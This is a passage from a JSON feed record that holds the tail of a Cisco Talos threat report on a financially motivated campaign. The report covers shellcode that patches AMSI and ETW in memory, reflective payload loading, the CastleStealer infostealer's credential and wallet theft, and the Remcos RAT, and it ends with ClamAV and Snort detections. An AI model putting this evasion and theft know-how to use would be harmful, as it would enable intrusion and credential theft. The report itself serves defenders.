mechanisms. The primary technique resolves the target functions AmsiScanBuffer&#xA0;in&#xA0;&#x201C;amsi.dll&#x201D;&#xA0;and&#xA0;EtwEventWrite&#xA0;in&#xA0;&#x201C;ntdll.dll&#x201D;&#xA0;using runtime hash-based API resolution, then overwrites their first bytes in memory with a patch that forces AMSI to always return a clean scan result and the ETW write function to return immediately without writing the output, effectively neutralizing both interfaces. If the primary patching technique fails, the shellcode executes a fallback mechanism where it calls&#xA0;VirtualProtect&#xA0;to temporarily change the target function&apos;s memory page protection value to read-write-execute and writes the same patch bytes directly, then restores the original page protection.&#xA0; Figure 24.&#xA0;Shellcode snippet of instructions for AMSI bypass.&#xA0;Then, it decrypts the embedded encrypted payload blob and decompresses the decrypted data using LZX decompression into a newly&#xA0;allocated&#xA0;memory region. The payload is&#xA0;subsequently&#xA0;dispatched either by the reflective PE injection technique or by .NET CLR loading through the&#xA0;ICorRuntimeHost&#xA0;COM interface for .NET binaries, or through the PowerShell&#xA0;Runspace&#xA0;for PowerShell scripts.&#xA0; Figure 25.&#xA0;Shellcode snippet of decryption function and decrypted payload in memory.&#xA0;Talos discovered that the threat actor&#xA0;can deliver&#xA0;CastleStealer&#xA0;implant&#xA0;through the x64 shellcode and the&#xA0;Remcos&#xA0;RAT through the x32 shellcode variant.&#xA0;&#xA0; CastleStealer&#xA0;is a .NET-based infostealer and credential harvesting implant designed to systematically extract sensitive data from compromised Windows hosts. It incorporates several anti-analysis measures,&#xA0;including a Russian locale exclusion check and a hardcoded build expiry timestamp, ensuring it executes only against genuine targets within a defined operational window. Its credential theft surface is broad, targeting the full Chromium browser family and Firefox through direct SQLite database access, with decryption support for both legacy DPAPI-protected credentials and the AES-GCM application&#xA0;bound encryption scheme. Beyond browser data, it&#xA0;enumerates&#xA0;crypto wallet browser extensions, Discord and Telegram session files, Steam account credentials, and targeted filesystem paths, transmitting all collected material over a TCP socket to&#xA0;the attacker-controlled infrastructure.&#xA0;CastleStealer&#x2019;s&#xA0;secondary payload delivery capability allows the&#xA0;actor&#xA0;to&#xA0;implant further payloads&#xA0;through process injection&#xA0;technique&#xA0;or PowerShell&#xA0;script&#xA0;execution.&#xA0;&#xA0; Figure 26.&#xA0;Snippet of&#xA0;CastleStealer&#xA0;malware&#xA0;function.&#xA0;Remcos&#xA0;RAT (Remote Control and Surveillance) is a&#xA0;commercial&#xA0;remote access tool originally&#xA0;sold&#xA0;as a legitimate remote administration tool. However, it has been&#xA0;extensively abused by&#xA0;a wide range of&#xA0;threat actors&#xA0;since its emergence in 2016. It provides operators with&#xA0;comprehensive post-exploitation capabilitiesincluding real-time keylogging, screen and webcam capture, audio recording, file management, shell command execution, and clipboard&#xA0;monitoring&#xA0;all&#xA0;communicated over an encrypted channel to a configurable C2 server.&#xA0;&#xA0; Coverage&#xA0;The following ClamAV signature detects and blocks this threat:&#xA0; Txt.Downloader.Agent-10060312-0 Html.Downloader.Agent-10060313-0 Html.Downloader.Agent-10060314-0 Py.Loader.Agent-10060315-0 Py.Loader.Agent-10060316-0 Ps1.Trojan.Agent-10060317-0 Ps1.Trojan.Agent-10060318-0 Ps1.Trojan.WLDRAgent-10060319-0 Ps1.Downloader.Agent-10060320-0 Win.Trojan.CastleStealer-10060341-0 Win.Trojan.Starland_Installer-10060342-0 Win.Malware.Starland-10060343-0 Win.Malware.Remka-10060344-0 The following Snort Rules&#xA0;Snort 2 and Snort 3&#xA0;(SIDs)&#xA0;to&#xA0;detect and block this threat:&#xA0;66787 &#x2013; 66790 and 301580&#xA0;&#xA0; IOCsThe IOCs for this threat are also available at our GitHub repository&#xA0;here.&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threats","rat","cisco-talos-antivirus","cisco-talos-dns-security","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","geo:inferred"],"relatedCves":[],"titleFingerprint":"11795-bespoke-campaign-deploys-financially-implant-motivated-novel-rat-starland-uat-wldr","countryCodes":["DE","RO","RU","US","VE"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/uat-11795-deploys-novel-starland-rat-and-bespoke-wldr-c2-implant-in-financially-motivated-campaign/","type":"report","title":"Cisco Talos: UAT-11795 deploys novel Starland RAT and bespoke WLDR C2 implant in financially motivated campaign"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-07-16T10:00:01.000Z","addedAt":"2026-07-29T20:53:06.649Z","updatedAt":"2026-07-29T20:53:06.649Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]}],"pagination":{"page":1,"limit":20,"total":8,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:19:40.648Z","durationMs":28,"filters":{"search":null,"severity":[],"type":[],"country":["RU"],"tag":[],"cwe":[],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}